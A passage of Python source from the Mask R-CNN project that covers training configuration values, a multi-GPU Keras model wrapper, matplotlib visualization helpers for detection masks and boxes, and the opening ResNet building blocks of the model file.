they # might take a while, so don't set this too small to avoid spending # a lot of time on validation stats. STEPS_PER_EPOCH = 1000 # Number of validation steps to run at the end of every training epoch. # A bigger number improves accuracy of validation stats, but slows # down the training. VALIDATION_STEPS = 50 # Backbone network architecture # Supported values are: resnet50, resnet101. # You can also provide a callable that should have the signature # of model.resnet_graph. If you do so, you need to supply a callable # to COMPUTE_BACKBONE_SHAPE as well BACKBONE = "resnet101" # Only useful if you supply a callable to BACKBONE. Should compute # the shape of each layer of the FPN Pyramid. # See model.compute_backbone_shapes COMPUTE_BACKBONE_SHAPE = None # The strides of each layer of the FPN Pyramid. These values # are based on a Resnet101 backbone. 
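    # For the default 1024x1024 input this yields feature maps of
    # 256, 128, 64, 32 and 16 pixels per side (1024 / stride).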
BACKBONE_STRIDES = [4, 8, 16, 32, 64] # Size of the fully-connected layers in the classification graph FPN_CLASSIF_FC_LAYERS_SIZE = 1024 # Size of the top-down layers used to build the feature pyramid TOP_DOWN_PYRAMID_SIZE = 256 # Number of classification classes (including background) NUM_CLASSES = 1 # Override in sub-classes # Length of square anchor side in pixels RPN_ANCHOR_SCALES = (32, 64, 128, 256, 512) # Ratios of anchors at each cell (width/height) # A value of 1 represents a square anchor, and 0.5 is a wide anchor RPN_ANCHOR_RATIOS = [0.5, 1, 2] # Anchor stride # If 1 then anchors are created for each cell in the backbone feature map. # If 2, then anchors are created for every other cell, and so on. RPN_ANCHOR_STRIDE = 1 # Non-max suppression threshold to filter RPN proposals. # You can increase this during training to generate more propsals. RPN_NMS_THRESHOLD = 0.7 # How many anchors per image to use for RPN training RPN_TRAIN_ANCHORS_PER_IMAGE = 256 # ROIs kept after tf.nn.top_k and before non-maximum suppression PRE_NMS_LIMIT = 6000 # ROIs kept after non-maximum suppression (training and inference) POST_NMS_ROIS_TRAINING = 2000 POST_NMS_ROIS_INFERENCE = 1000 # If enabled, resizes instance masks to a smaller size to reduce # memory load. Recommended when using high-resolution images. USE_MINI_MASK = True MINI_MASK_SHAPE = (56, 56) # (height, width) of the mini-mask # Input image resizing # Generally, use the "square" resizing mode for training and predicting # and it should work well in most cases. In this mode, images are scaled # up such that the small side is = IMAGE_MIN_DIM, but ensuring that the # scaling doesn't make the long side > IMAGE_MAX_DIM. Then the image is # padded with zeros to make it a square so multiple images can be put # in one batch. # Available resizing modes: # none: No resizing or padding. Return the image unchanged. # square: Resize and pad with zeros to get a square image # of size [max_dim, max_dim]. # pad64: Pads width and height with zeros to make them multiples of 64. # If IMAGE_MIN_DIM or IMAGE_MIN_SCALE are not None, then it scales # up before padding. IMAGE_MAX_DIM is ignored in this mode. # The multiple of 64 is needed to ensure smooth scaling of feature # maps up and down the 6 levels of the FPN pyramid (2**6=64). # crop: Picks random crops from the image. First, scales the image based # on IMAGE_MIN_DIM and IMAGE_MIN_SCALE, then picks a random crop of # size IMAGE_MIN_DIM x IMAGE_MIN_DIM. Can be used in training only. # IMAGE_MAX_DIM is not used in this mode. IMAGE_RESIZE_MODE = "square" IMAGE_MIN_DIM = 800 IMAGE_MAX_DIM = 1024 # Minimum scaling ratio. Checked after MIN_IMAGE_DIM and can force further # up scaling. For example, if set to 2 then images are scaled up to double # the width and height, or more, even if MIN_IMAGE_DIM doesn't require it. # However, in 'square' mode, it can be overruled by IMAGE_MAX_DIM. IMAGE_MIN_SCALE = 0 # Number of color channels per image. RGB = 3, grayscale = 1, RGB-D = 4 # Changing this requires other changes in the code. See the WIKI for more # details: https://github.com/matterport/Mask_RCNN/wiki IMAGE_CHANNEL_COUNT = 3 # Image mean (RGB) MEAN_PIXEL = np.array([123.7, 116.8, 103.9]) # Number of ROIs per image to feed to classifier/mask heads # The Mask RCNN paper uses 512 but often the RPN doesn't generate # enough positive proposals to fill this and keep a positive:negative # ratio of 1:3. You can increase the number of proposals by adjusting # the RPN NMS threshold. 
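    # With ROI_POSITIVE_RATIO = 0.33 (below), roughly a third of these
    # ROIs (about 66 of 200) are expected to be positive.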
TRAIN_ROIS_PER_IMAGE = 200 # Percent of positive ROIs used to train classifier/mask heads ROI_POSITIVE_RATIO = 0.33 # Pooled ROIs POOL_SIZE = 7 MASK_POOL_SIZE = 14 # Shape of output mask # To change this you also need to change the neural network mask branch MASK_SHAPE = [28, 28] # Maximum number of ground truth instances to use in one image MAX_GT_INSTANCES = 100 # Bounding box refinement standard deviation for RPN and final detections. RPN_BBOX_STD_DEV = np.array([0.1, 0.1, 0.2, 0.2]) BBOX_STD_DEV = np.array([0.1, 0.1, 0.2, 0.2]) # Max number of final detections DETECTION_MAX_INSTANCES = 100 # Minimum probability value to accept a detected instance # ROIs below this threshold are skipped DETECTION_MIN_CONFIDENCE = 0.7 # Non-maximum suppression threshold for detection DETECTION_NMS_THRESHOLD = 0.3 # Learning rate and momentum # The Mask RCNN paper uses lr=0.02, but on TensorFlow it causes # weights to explode. Likely due to differences in optimizer # implementation. LEARNING_RATE = 0.001 LEARNING_MOMENTUM = 0.9 # Weight decay regularization WEIGHT_DECAY = 0.0001 # Loss weights for more precise optimization. # Can be used for R-CNN training setup. LOSS_WEIGHTS = { "rpn_class_loss": 1., "rpn_bbox_loss": 1., "mrcnn_class_loss": 1., "mrcnn_bbox_loss": 1., "mrcnn_mask_loss": 1. } # Use RPN ROIs or externally generated ROIs for training # Keep this True for most situations. Set to False if you want to train # the head branches on ROI generated by code rather than the ROIs from # the RPN. For example, to debug the classifier head without having to # train the RPN. USE_RPN_ROIS = True # Train or freeze batch normalization layers # None: Train BN layers. This is the normal mode # False: Freeze BN layers. Good when using a small batch size # True: (don't use). Set layer in training mode even when predicting TRAIN_BN = False # Defaulting to False since batch size is often small # Gradient norm clipping GRADIENT_CLIP_NORM = 5.0 def __init__(self): """Set values of computed attributes.""" # Effective batch size self.BATCH_SIZE = self.IMAGES_PER_GPU * self.GPU_COUNT # Input image size if self.IMAGE_RESIZE_MODE == "crop": self.IMAGE_SHAPE = np.array([self.IMAGE_MIN_DIM, self.IMAGE_MIN_DIM, self.IMAGE_CHANNEL_COUNT]) else: self.IMAGE_SHAPE = np.array([self.IMAGE_MAX_DIM, self.IMAGE_MAX_DIM, self.IMAGE_CHANNEL_COUNT]) # Image meta data length # See compose_image_meta() for details self.IMAGE_META_SIZE = 1 + 3 + 3 + 4 + 1 + self.NUM_CLASSES def display(self): """Display Configuration values.""" print("\nConfigurations:") for a in dir(self): if not a.startswith("__") and not callable(getattr(self, a)): print("{:30} {}".format(a, getattr(self, a))) print("\n") File: mrcnn/parallel_model.py """ Mask R-CNN Multi-GPU Support for Keras. Copyright (c) 2017 Matterport, Inc. Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla Ideas and a small code snippets from these sources: https://github.com/fchollet/keras/issues/2436 https://medium.com/@kuza55/transparent-multi-gpu-training-on-tensorflow-with-keras-8b0016fd9012 https://github.com/avolkov1/keras_experiments/blob/master/keras_exp/multigpu/ https://github.com/fchollet/keras/blob/master/keras/utils/training_utils.py """ import tensorflow as tf import keras.backend as K import keras.layers as KL import keras.models as KM class ParallelModel(KM.Model): """Subclasses the standard Keras Model and adds multi-GPU support. It works by creating a copy of the model on each GPU. 
Then it slices the inputs and sends a slice to each copy of the model, and then merges the outputs together and applies the loss on the combined outputs. """ def __init__(self, keras_model, gpu_count): """Class constructor. keras_model: The Keras model to parallelize gpu_count: Number of GPUs. Must be > 1 """ self.inner_model = keras_model self.gpu_count = gpu_count merged_outputs = self.make_parallel() super(ParallelModel, self).__init__(inputs=self.inner_model.inputs, outputs=merged_outputs) def __getattribute__(self, attrname): """Redirect loading and saving methods to the inner model. That's where the weights are stored.""" if 'load' in attrname or 'save' in attrname: return getattr(self.inner_model, attrname) return super(ParallelModel, self).__getattribute__(attrname) def summary(self, *args, **kwargs): """Override summary() to display summaries of both, the wrapper and inner models.""" super(ParallelModel, self).summary(*args, **kwargs) self.inner_model.summary(*args, **kwargs) def make_parallel(self): """Creates a new wrapper model that consists of multiple replicas of the original model placed on different GPUs. """ # Slice inputs. Slice inputs on the CPU to avoid sending a copy # of the full inputs to all GPUs. Saves on bandwidth and memory. input_slices = {name: tf.split(x, self.gpu_count) for name, x in zip(self.inner_model.input_names, self.inner_model.inputs)} output_names = self.inner_model.output_names outputs_all = [] for i in range(len(self.inner_model.outputs)): outputs_all.append([]) # Run the model call() on each GPU to place the ops there for i in range(self.gpu_count): with tf.device('/gpu:%d' % i): with tf.name_scope('tower_%d' % i): # Run a slice of inputs through this replica zipped_inputs = zip(self.inner_model.input_names, self.inner_model.inputs) inputs = [ KL.Lambda(lambda s: input_slices[name][i], output_shape=lambda s: (None,) + s[1:])(tensor) for name, tensor in zipped_inputs] # Create the model replica and get the outputs outputs = self.inner_model(inputs) if not isinstance(outputs, list): outputs = [outputs] # Save the outputs for merging back together later for l, o in enumerate(outputs): outputs_all[l].append(o) # Merge outputs on CPU with tf.device('/cpu:0'): merged = [] for outputs, name in zip(outputs_all, output_names): # Concatenate or average outputs? # Outputs usually have a batch dimension and we concatenate # across it. If they don't, then the output is likely a loss # or a metric value that gets averaged across the batch. # Keras expects losses and metrics to be scalars. if K.int_shape(outputs[0]) == (): # Average m = KL.Lambda(lambda o: tf.add_n(o) / len(outputs), name=name)(outputs) else: # Concatenate m = KL.Concatenate(axis=0, name=name)(outputs) merged.append(m) return merged if __name__ == "__main__": # Testing code below. It creates a simple model to train on MNIST and # tries to run it on 2 GPUs. It saves the graph so it can be viewed # in TensorBoard. Run it as: # # python3 parallel_model.py import os import numpy as np import keras.optimizers from keras.datasets import mnist from keras.preprocessing.image import ImageDataGenerator GPU_COUNT = 2 # Root directory of the project ROOT_DIR = os.path.abspath("../") # Directory to save logs and trained model MODEL_DIR = os.path.join(ROOT_DIR, "logs") def build_model(x_train, num_classes): # Reset default graph. Keras leaves old ops in the graph, # which are ignored for execution but clutter graph # visualization in TensorBoard. 
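        # build_model() returns a plain Keras Model; multi-GPU support is
        # added afterwards by wrapping it in ParallelModel (see below).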
tf.reset_default_graph() inputs = KL.Input(shape=x_train.shape[1:], name="input_image") x = KL.Conv2D(32, (3, 3), activation='relu', padding="same", name="conv1")(inputs) x = KL.Conv2D(64, (3, 3), activation='relu', padding="same", name="conv2")(x) x = KL.MaxPooling2D(pool_size=(2, 2), name="pool1")(x) x = KL.Flatten(name="flat1")(x) x = KL.Dense(128, activation='relu', name="dense1")(x) x = KL.Dense(num_classes, activation='softmax', name="dense2")(x) return KM.Model(inputs, x, "digit_classifier_model") # Load MNIST Data (x_train, y_train), (x_test, y_test) = mnist.load_data() x_train = np.expand_dims(x_train, -1).astype('float32') / 255 x_test = np.expand_dims(x_test, -1).astype('float32') / 255 print('x_train shape:', x_train.shape) print('x_test shape:', x_test.shape) # Build data generator and model datagen = ImageDataGenerator() model = build_model(x_train, 10) # Add multi-GPU support. model = ParallelModel(model, GPU_COUNT) optimizer = keras.optimizers.SGD(lr=0.01, momentum=0.9, clipnorm=5.0) model.compile(loss='sparse_categorical_crossentropy', optimizer=optimizer, metrics=['accuracy']) model.summary() # Train model.fit_generator( datagen.flow(x_train, y_train, batch_size=64), steps_per_epoch=50, epochs=10, verbose=1, validation_data=(x_test, y_test), callbacks=[keras.callbacks.TensorBoard(log_dir=MODEL_DIR, write_graph=True)] ) File: mrcnn/__init__.py File: mrcnn/visualize.py """ Mask R-CNN Display and Visualization Functions. Copyright (c) 2017 Matterport, Inc. Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla """ import os import sys import random import itertools import colorsys import numpy as np from skimage.measure import find_contours import matplotlib.pyplot as plt from matplotlib import patches, lines from matplotlib.patches import Polygon import IPython.display # Root directory of the project ROOT_DIR = os.path.abspath("../") # Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version of the library from mrcnn import utils ############################################################ # Visualization ############################################################ def display_images(images, titles=None, cols=4, cmap=None, norm=None, interpolation=None): """Display the given set of images, optionally with titles. images: list or array of image tensors in HWC format. titles: optional. A list of titles to display with each image. cols: number of images per row cmap: Optional. Color map to use. For example, "Blues". norm: Optional. A Normalize instance to map values to colors. interpolation: Optional. Image interpolation to use for display. """ titles = titles if titles is not None else [""] * len(images) rows = len(images) // cols + 1 plt.figure(figsize=(14, 14 * rows // cols)) i = 1 for image, title in zip(images, titles): plt.subplot(rows, cols, i) plt.title(title, fontsize=9) plt.axis('off') plt.imshow(image.astype(np.uint8), cmap=cmap, norm=norm, interpolation=interpolation) i += 1 plt.show() def random_colors(N, bright=True): """ Generate random colors. To get visually distinct colors, generate them in HSV space then convert to RGB. """ brightness = 1.0 if bright else 0.7 hsv = [(i / N, 1, brightness) for i in range(N)] colors = list(map(lambda c: colorsys.hsv_to_rgb(*c), hsv)) random.shuffle(colors) return colors def apply_mask(image, mask, color, alpha=0.5): """Apply the given mask to the image. 
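    color: (r, g, b) channel multipliers in [0, 1], e.g. the tuples
        produced by random_colors(). alpha controls how strongly the
        color is blended over the masked pixels.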
""" for c in range(3): image[:, :, c] = np.where(mask == 1, image[:, :, c] * (1 - alpha) + alpha * color[c] * 255, image[:, :, c]) return image def display_instances(image, boxes, masks, class_ids, class_names, scores=None, title="", figsize=(16, 16), ax=None, show_mask=True, show_bbox=True, colors=None, captions=None): """ boxes: [num_instance, (y1, x1, y2, x2, class_id)] in image coordinates. masks: [height, width, num_instances] class_ids: [num_instances] class_names: list of class names of the dataset scores: (optional) confidence scores for each box title: (optional) Figure title show_mask, show_bbox: To show masks and bounding boxes or not figsize: (optional) the size of the image colors: (optional) An array or colors to use with each object captions: (optional) A list of strings to use as captions for each object """ # Number of instances N = boxes.shape[0] if not N: print("\n*** No instances to display *** \n") else: assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0] # If no axis is passed, create one and automatically call show() auto_show = False if not ax: _, ax = plt.subplots(1, figsize=figsize) auto_show = True # Generate random colors colors = colors or random_colors(N) # Show area outside image boundaries. height, width = image.shape[:2] ax.set_ylim(height + 10, -10) ax.set_xlim(-10, width + 10) ax.axis('off') ax.set_title(title) masked_image = image.astype(np.uint32).copy() for i in range(N): color = colors[i] # Bounding box if not np.any(boxes[i]): # Skip this instance. Has no bbox. Likely lost in image cropping. continue y1, x1, y2, x2 = boxes[i] if show_bbox: p = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2, alpha=0.7, linestyle="dashed", edgecolor=color, facecolor='none') ax.add_patch(p) # Label if not captions: class_id = class_ids[i] score = scores[i] if scores is not None else None label = class_names[class_id] caption = "{} {:.3f}".format(label, score) if score else label else: caption = captions[i] ax.text(x1, y1 + 8, caption, color='w', size=11, backgroundcolor="none") # Mask mask = masks[:, :, i] if show_mask: masked_image = apply_mask(masked_image, mask, color) # Mask Polygon # Pad to ensure proper polygons for masks that touch image edges. padded_mask = np.zeros( (mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8) padded_mask[1:-1, 1:-1] = mask contours = find_contours(padded_mask, 0.5) for verts in contours: # Subtract the padding and flip (y, x) to (x, y) verts = np.fliplr(verts) - 1 p = Polygon(verts, facecolor="none", edgecolor=color) ax.add_patch(p) ax.imshow(masked_image.astype(np.uint8)) if auto_show: plt.show() def display_differences(image, gt_box, gt_class_id, gt_mask, pred_box, pred_class_id, pred_score, pred_mask, class_names, title="", ax=None, show_mask=True, show_box=True, iou_threshold=0.5, score_threshold=0.5): """Display ground truth and prediction instances on the same image.""" # Match predictions to ground truth gt_match, pred_match, overlaps = utils.compute_matches( gt_box, gt_class_id, gt_mask, pred_box, pred_class_id, pred_score, pred_mask, iou_threshold=iou_threshold, score_threshold=score_threshold) # Ground truth = green. 
Predictions = red colors = [(0, 1, 0, .8)] * len(gt_match)\ + [(1, 0, 0, 1)] * len(pred_match) # Concatenate GT and predictions class_ids = np.concatenate([gt_class_id, pred_class_id]) scores = np.concatenate([np.zeros([len(gt_match)]), pred_score]) boxes = np.concatenate([gt_box, pred_box]) masks = np.concatenate([gt_mask, pred_mask], axis=-1) # Captions per instance show score/IoU captions = ["" for m in gt_match] + ["{:.2f} / {:.2f}".format( pred_score[i], (overlaps[i, int(pred_match[i])] if pred_match[i] > -1 else overlaps[i].max())) for i in range(len(pred_match))] # Set title if not provided title = title or "Ground Truth and Detections\n GT=green, pred=red, captions: score/IoU" # Display display_instances( image, boxes, masks, class_ids, class_names, scores, ax=ax, show_bbox=show_box, show_mask=show_mask, colors=colors, captions=captions, title=title) def draw_rois(image, rois, refined_rois, mask, class_ids, class_names, limit=10): """ anchors: [n, (y1, x1, y2, x2)] list of anchors in image coordinates. proposals: [n, 4] the same anchors but refined to fit objects better. """ masked_image = image.copy() # Pick random anchors in case there are too many. ids = np.arange(rois.shape[0], dtype=np.int32) ids = np.random.choice( ids, limit, replace=False) if ids.shape[0] > limit else ids fig, ax = plt.subplots(1, figsize=(12, 12)) if rois.shape[0] > limit: plt.title("Showing {} random ROIs out of {}".format( len(ids), rois.shape[0])) else: plt.title("{} ROIs".format(len(ids))) # Show area outside image boundaries. ax.set_ylim(image.shape[0] + 20, -20) ax.set_xlim(-50, image.shape[1] + 20) ax.axis('off') for i, id in enumerate(ids): color = np.random.rand(3) class_id = class_ids[id] # ROI y1, x1, y2, x2 = rois[id] p = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2, edgecolor=color if class_id else "gray", facecolor='none', linestyle="dashed") ax.add_patch(p) # Refined ROI if class_id: ry1, rx1, ry2, rx2 = refined_rois[id] p = patches.Rectangle((rx1, ry1), rx2 - rx1, ry2 - ry1, linewidth=2, edgecolor=color, facecolor='none') ax.add_patch(p) # Connect the top-left corners of the anchor and proposal for easy visualization ax.add_line(lines.Line2D([x1, rx1], [y1, ry1], color=color)) # Label label = class_names[class_id] ax.text(rx1, ry1 + 8, "{}".format(label), color='w', size=11, backgroundcolor="none") # Mask m = utils.unmold_mask(mask[id], rois[id] [:4].astype(np.int32), image.shape) masked_image = apply_mask(masked_image, m, color) ax.imshow(masked_image) # Print stats print("Positive ROIs: ", class_ids[class_ids > 0].shape[0]) print("Negative ROIs: ", class_ids[class_ids == 0].shape[0]) print("Positive Ratio: {:.2f}".format( class_ids[class_ids > 0].shape[0] / class_ids.shape[0])) # TODO: Replace with matplotlib equivalent? def draw_box(image, box, color): """Draw 3-pixel width bounding boxes on the given image array. color: list of 3 int values for RGB. 
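    box: [y1, x1, y2, x2] in image coordinates, the same ordering used
        throughout this module.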
""" y1, x1, y2, x2 = box image[y1:y1 + 2, x1:x2] = color image[y2:y2 + 2, x1:x2] = color image[y1:y2, x1:x1 + 2] = color image[y1:y2, x2:x2 + 2] = color return image def display_top_masks(image, mask, class_ids, class_names, limit=4): """Display the given image and the top few class masks.""" to_display = [] titles = [] to_display.append(image) titles.append("H x W={}x{}".format(image.shape[0], image.shape[1])) # Pick top prominent classes in this image unique_class_ids = np.unique(class_ids) mask_area = [np.sum(mask[:, :, np.where(class_ids == i)[0]]) for i in unique_class_ids] top_ids = [v[0] for v in sorted(zip(unique_class_ids, mask_area), key=lambda r: r[1], reverse=True) if v[1] > 0] # Generate images and titles for i in range(limit): class_id = top_ids[i] if i < len(top_ids) else -1 # Pull masks of instances belonging to the same class. m = mask[:, :, np.where(class_ids == class_id)[0]] m = np.sum(m * np.arange(1, m.shape[-1] + 1), -1) to_display.append(m) titles.append(class_names[class_id] if class_id != -1 else "-") display_images(to_display, titles=titles, cols=limit + 1, cmap="Blues_r") def plot_precision_recall(AP, precisions, recalls): """Draw the precision-recall curve. AP: Average precision at IoU >= 0.5 precisions: list of precision values recalls: list of recall values """ # Plot the Precision-Recall curve _, ax = plt.subplots(1) ax.set_title("Precision-Recall Curve. AP@50 = {:.3f}".format(AP)) ax.set_ylim(0, 1.1) ax.set_xlim(0, 1.1) _ = ax.plot(recalls, precisions) def plot_overlaps(gt_class_ids, pred_class_ids, pred_scores, overlaps, class_names, threshold=0.5): """Draw a grid showing how ground truth objects are classified. gt_class_ids: [N] int. Ground truth class IDs pred_class_id: [N] int. Predicted class IDs pred_scores: [N] float. The probability scores of predicted classes overlaps: [pred_boxes, gt_boxes] IoU overlaps of predictions and GT boxes. class_names: list of all class names in the dataset threshold: Float. The prediction probability required to predict a class """ gt_class_ids = gt_class_ids[gt_class_ids != 0] pred_class_ids = pred_class_ids[pred_class_ids != 0] plt.figure(figsize=(12, 10)) plt.imshow(overlaps, interpolation='nearest', cmap=plt.cm.Blues) plt.yticks(np.arange(len(pred_class_ids)), ["{} ({:.2f})".format(class_names[int(id)], pred_scores[i]) for i, id in enumerate(pred_class_ids)]) plt.xticks(np.arange(len(gt_class_ids)), [class_names[int(id)] for id in gt_class_ids], rotation=90) thresh = overlaps.max() / 2. for i, j in itertools.product(range(overlaps.shape[0]), range(overlaps.shape[1])): text = "" if overlaps[i, j] > threshold: text = "match" if gt_class_ids[j] == pred_class_ids[i] else "wrong" color = ("white" if overlaps[i, j] > thresh else "black" if overlaps[i, j] > 0 else "grey") plt.text(j, i, "{:.3f}\n{}".format(overlaps[i, j], text), horizontalalignment="center", verticalalignment="center", fontsize=9, color=color) plt.tight_layout() plt.xlabel("Ground Truth") plt.ylabel("Predictions") def draw_boxes(image, boxes=None, refined_boxes=None, masks=None, captions=None, visibilities=None, title="", ax=None): """Draw bounding boxes and segmentation masks with different customizations. boxes: [N, (y1, x1, y2, x2, class_id)] in image coordinates. refined_boxes: Like boxes, but draw with solid lines to show that they're the result of refining 'boxes'. masks: [N, height, width] captions: List of N titles to display on each box visibilities: (optional) List of values of 0, 1, or 2. Determine how prominent each bounding box should be. 
title: An optional title to show over the image ax: (optional) Matplotlib axis to draw on. """ # Number of boxes assert boxes is not None or refined_boxes is not None N = boxes.shape[0] if boxes is not None else refined_boxes.shape[0] # Matplotlib Axis if not ax: _, ax = plt.subplots(1, figsize=(12, 12)) # Generate random colors colors = random_colors(N) # Show area outside image boundaries. margin = image.shape[0] // 10 ax.set_ylim(image.shape[0] + margin, -margin) ax.set_xlim(-margin, image.shape[1] + margin) ax.axis('off') ax.set_title(title) masked_image = image.astype(np.uint32).copy() for i in range(N): # Box visibility visibility = visibilities[i] if visibilities is not None else 1 if visibility == 0: color = "gray" style = "dotted" alpha = 0.5 elif visibility == 1: color = colors[i] style = "dotted" alpha = 1 elif visibility == 2: color = colors[i] style = "solid" alpha = 1 # Boxes if boxes is not None: if not np.any(boxes[i]): # Skip this instance. Has no bbox. Likely lost in cropping. continue y1, x1, y2, x2 = boxes[i] p = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2, alpha=alpha, linestyle=style, edgecolor=color, facecolor='none') ax.add_patch(p) # Refined boxes if refined_boxes is not None and visibility > 0: ry1, rx1, ry2, rx2 = refined_boxes[i].astype(np.int32) p = patches.Rectangle((rx1, ry1), rx2 - rx1, ry2 - ry1, linewidth=2, edgecolor=color, facecolor='none') ax.add_patch(p) # Connect the top-left corners of the anchor and proposal if boxes is not None: ax.add_line(lines.Line2D([x1, rx1], [y1, ry1], color=color)) # Captions if captions is not None: caption = captions[i] # If there are refined boxes, display captions on them if refined_boxes is not None: y1, x1, y2, x2 = ry1, rx1, ry2, rx2 ax.text(x1, y1, caption, size=11, verticalalignment='top', color='w', backgroundcolor="none", bbox={'facecolor': color, 'alpha': 0.5, 'pad': 2, 'edgecolor': 'none'}) # Masks if masks is not None: mask = masks[:, :, i] masked_image = apply_mask(masked_image, mask, color) # Mask Polygon # Pad to ensure proper polygons for masks that touch image edges. padded_mask = np.zeros( (mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8) padded_mask[1:-1, 1:-1] = mask contours = find_contours(padded_mask, 0.5) for verts in contours: # Subtract the padding and flip (y, x) to (x, y) verts = np.fliplr(verts) - 1 p = Polygon(verts, facecolor="none", edgecolor=color) ax.add_patch(p) ax.imshow(masked_image.astype(np.uint8)) def display_table(table): """Display values in a table format. table: an iterable of rows, and each row is an iterable of values. """ html = "" for row in table: row_html = "" for col in row: row_html += "<td>{:40}</td>".format(str(col)) html += "<tr>" + row_html + "</tr>" html = "<table>" + html + "</table>" IPython.display.display(IPython.display.HTML(html)) def display_weight_stats(model): """Scans all the weights in the model and returns a list of tuples that contain stats about each weight. """ layers = model.get_trainable_layers() table = [["WEIGHT NAME", "SHAPE", "MIN", "MAX", "STD"]] for l in layers: weight_values = l.get_weights() # list of Numpy arrays weight_tensors = l.weights # list of TF tensors for i, w in enumerate(weight_values): weight_name = weight_tensors[i].name # Detect problematic layers. Exclude biases of conv layers. 
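            # A weight tensor whose min equals its max is constant, which
            # usually indicates a layer that never trained ("dead?" below);
            # very large magnitudes are flagged as possible overflow.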
alert = "" if w.min() == w.max() and not (l.__class__.__name__ == "Conv2D" and i == 1): alert += "<span style='color:red'>*** dead?</span>" if np.abs(w.min()) > 1000 or np.abs(w.max()) > 1000: alert += "<span style='color:red'>*** Overflow?</span>" # Add row table.append([ weight_name + alert, str(w.shape), "{:+9.4f}".format(w.min()), "{:+10.4f}".format(w.max()), "{:+9.4f}".format(w.std()), ]) display_table(table) File: mrcnn/model.py """ Mask R-CNN The main Mask R-CNN model implementation. Copyright (c) 2017 Matterport, Inc. Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla """ import os import random import datetime import re import math import logging from collections import OrderedDict import multiprocessing import numpy as np import tensorflow as tf import keras import keras.backend as K import keras.layers as KL import keras.engine as KE import keras.models as KM from mrcnn import utils # Requires TensorFlow 1.3+ and Keras 2.0.8+. from distutils.version import LooseVersion assert LooseVersion(tf.__version__) >= LooseVersion("1.3") assert LooseVersion(keras.__version__) >= LooseVersion('2.0.8') ############################################################ # Utility Functions ############################################################ def log(text, array=None): """Prints a text message. And, optionally, if a Numpy array is provided it prints it's shape, min, and max values. """ if array is not None: text = text.ljust(25) text += ("shape: {:20} ".format(str(array.shape))) if array.size: text += ("min: {:10.5f} max: {:10.5f}".format(array.min(),array.max())) else: text += ("min: {:10} max: {:10}".format("","")) text += " {}".format(array.dtype) print(text) class BatchNorm(KL.BatchNormalization): """Extends the Keras BatchNormalization class to allow a central place to make changes if needed. Batch normalization has a negative effect on training if batches are small so this layer is often frozen (via setting in Config class) and functions as linear layer. """ def call(self, inputs, training=None): """ Note about training values: None: Train BN layers. This is the normal mode False: Freeze BN layers. Good when batch size is small True: (don't use). Set layer in training mode even when making inferences """ return super(self.__class__, self).call(inputs, training=training) def compute_backbone_shapes(config, image_shape): """Computes the width and height of each stage of the backbone network. Returns: [N, (height, width)]. 
Where N is the number of stages """ if callable(config.BACKBONE): return config.COMPUTE_BACKBONE_SHAPE(image_shape) # Currently supports ResNet only assert config.BACKBONE in ["resnet50", "resnet101"] return np.array( [[int(math.ceil(image_shape[0] / stride)), int(math.ceil(image_shape[1] / stride))] for stride in config.BACKBONE_STRIDES]) ############################################################ # Resnet Graph ############################################################ # Code adopted from: # https://github.com/fchollet/deep-learning-models/blob/master/resnet50.py def identity_block(input_tensor, kernel_size, filters, stage, block, use_bias=True, train_bn=True): """The identity_block is the block that has no conv layer at shortcut # Arguments input_tensor: input tensor kernel_size: default 3, the kernel size of middle conv layer at main path filters: list of integers, the nb_filters of 3 conv layer at main path stage: integer, current stage label, used for generating layer names block: 'a','b'..., current block label, used for generating layer names use_bias: Boolean. To use or not use a bias in conv layers. train_bn: Boolean. Train or freeze Batch Norm layers """ nb_filter1, nb_filter2, nb_filter3 = filters conv_name_base = 'res' + str(stage) + block + '_branch' bn_name_base = 'bn' + str(stage) + block + '_branch' x = KL.Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a', use_bias=use_bias)(input_tensor) x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same', name=conv_name_base + '2b', use_bias=use_bias)(x) x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', use_bias=use_bias)(x) x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn) x = KL.Add()([x, input_tensor]) x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x) return x def conv_block(input_tensor, kernel_size, filters, stage, block, strides=(2, 2), use_bias=True, train_bn=True): """conv_block is the block that has a conv layer at shortcut # Arguments input_tensor: input tensor kernel_size: default 3, the kernel size of middle conv layer at main path filters: list of integers, the nb_filters of 3 conv layer at main path stage: integer, current stage label, used for generating layer names block: 'a','b'..., current block label, used for generating layer names use_bias: Boolean. To use or not use a bias in conv layers. train_bn: Boolean. 
Train or freeze Batch Norm layers Note that from stage 3, the first conv layer at main path is with subsample=(2,2) And the shortcut should have subsample=(2,2) as well """ nb_filter1, nb_filter2, nb_filter3 = filters conv_name_base = 'res' + str(stage) + block + '_branch' bn_name_base = 'bn' + str(stage) + block + '_branch' x = KL.Conv2D(nb_filter1, (1, 1), strides=strides, name=conv_name_base + '2a', use_bias=use_bias)(input_tensor) x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same', name=conv_name_base + '2b', use_bias=use_bias)(x) x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', use_bias=use_bias)(x) x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn) shortcut = KL.Conv2D(nb_filter3, (1, 1), strides=strides, name=conv_name_base + '1', use_bias=use_bias)(input_tensor) shortcut = BatchNorm(name=bn_name_base + '1')(shortcut, training=train_bn) x = KL.Add()([x, shortcut]) x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x) return x def resnet_graph(input_image, architecture, stage5=False, train_bn=True): """Build a ResNet graph. architecture: Can be resnet50 or resnet101 stage5: 